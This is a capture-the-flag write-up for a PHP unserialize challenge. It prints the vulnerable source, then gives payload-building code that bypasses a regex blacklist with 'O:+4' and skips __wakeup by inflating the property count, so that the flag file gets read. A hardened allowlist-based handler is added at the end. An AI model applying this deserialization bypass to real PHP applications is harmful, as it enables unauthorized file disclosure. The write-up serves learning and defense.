Solution to the unserialize3 challenge in the advanced Web area of Attack and Defense World

2022-07-08 00:16:00 B_ secretary

<?php
class Demo {
    private $file = 'index.php';
    // Constructor: called automatically when the object is created. The "__" prefix marks a magic method, which PHP calls automatically when its condition is met
    public function __construct($file) {
        $this->file = $file;
        // "->" in PHP is the equivalent of "." in Python; it is used to access an object's members
    }
    // Destructor: called automatically when the object is destroyed
    function __destruct() {
        // Print the contents of $file, showing the file to the reader
        echo @highlight_file($this->file, true);
    }
/* highlight_file(filename, return) syntax-highlights a file. If the return parameter is set to true, the function returns the highlighted code instead of printing it.
 Overall, this means that when the object is destroyed, the code of $file is output. The at sign (@) is PHP's error control operator: when it is prepended to an expression, any error messages that expression might generate are ignored. */

    // Called automatically when deserializing
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
        // Reset the file name to "index.php"
    }
}
if (isset($_GET['var'])) {
    /* isset checks whether the variable is set and not NULL; here it detects whether a var parameter was passed in the GET request */
    $var = base64_decode($_GET['var']);
    // Base64-decode var
    if (preg_match('/[oc]:\d+:/i', $var)) {
    // Check whether var contains a string matching the pattern
        die('stop hacking!');
    } else {
        @unserialize($var);
        // Deserialize var; this calls __wakeup
    }

} else {
    highlight_file("index.php");
    // Highlight index.php; this is not the result we want
}
?>

The challenge source code tells us the flag is in fl4g.php, so we want to read that file. The payload needs to satisfy two conditions:
1. It must not match the preg_match pattern, i.e. it bypasses the preg_match check
2. Deserialization must bypass the __wakeup function
So we use serialization to construct a var and pass it in, with the file property set to fl4g.php. When the object is destroyed, the destructor displays fl4g.php.

Code to construct the payload:

<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            $this->file = 'index.php';
        }
    }
}
$payload = new Demo('fl4g.php'); // Create a Demo object whose file value is fl4g.php
$payload = serialize($payload);  // Serialize it
$payload = str_replace('O:4', 'O:+4', $payload);
// Replace "O:4" with "O:+4" so that the regex no longer matches
$payload = str_replace(':1:', ':2:', $payload);
// Change the property count in the serialized string from "1" to "2" to bypass __wakeup (if the property count recorded in the serialized string is larger than the real number of properties, __wakeup is skipped)
// The non-printable characters in the serialized string are equivalent to %00 and must be kept in the payload
echo base64_encode($payload); // Base64-encode the payload and print it
?>
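
Both checks in the challenge (the regex blacklist and __wakeup) operate on attacker-controlled serialized data, which is why the payload above gets past them. The following is an added example, not part of the original challenge or write-up: a hardened handler that never instantiates classes from the request and only accepts an allowlisted file name. It assumes PHP 7.0 or later (for the options argument of unserialize); safeFileFromParam, ALLOWED_FILES and the sample inputs are names and values constructed for illustration.

```php
<?php
// Added example: hardened replacement for the challenge's request handling.
// Function name, constant and samples are assumptions, not challenge code.

const ALLOWED_FILES = ['index.php']; // assumed allowlist of viewable files

/**
 * Return an allowlisted file name taken from the "var" parameter,
 * or null when the input is rejected.
 */
function safeFileFromParam(string $encoded): ?string
{
    // Strict mode returns false on characters outside the base64 alphabet.
    $raw = base64_decode($encoded, true);
    if ($raw === false) {
        return null;
    }

    // allowed_classes => false turns every serialized object into an inert
    // __PHP_Incomplete_Class, so Demo::__wakeup and Demo::__destruct never run.
    $value = @unserialize($raw, ['allowed_classes' => false]);

    // Accept a plain string only; objects, arrays and parse failures are rejected.
    if (!is_string($value)) {
        return null;
    }

    // Allowlist comparison instead of a blacklist regex on the wire format.
    return in_array($value, ALLOWED_FILES, true) ? $value : null;
}

// Constructed sample inputs, including the payload shape built in the write-up.
$samples = [
    'allowed plain string'    => base64_encode(serialize('index.php')),
    'disallowed plain string' => base64_encode(serialize('fl4g.php')),
    'object, "+" and count 2' => base64_encode(
        "O:+4:\"Demo\":2:{s:10:\"\0Demo\0file\";s:8:\"fl4g.php\";}"
    ),
    'invalid base64'          => '%%%',
];

foreach ($samples as $label => $input) {
    $file = safeFileFromParam($input);
    printf("%-26s => %s\n", $label, $file === null ? 'rejected' : "show $file");
}
```

If the parameter only ever needs to carry a file name, replacing unserialize with json_decode removes the object-instantiation path entirely.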

Copyright notice
This article was created by [B_ secretary]. Please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/189/202207072208344453.html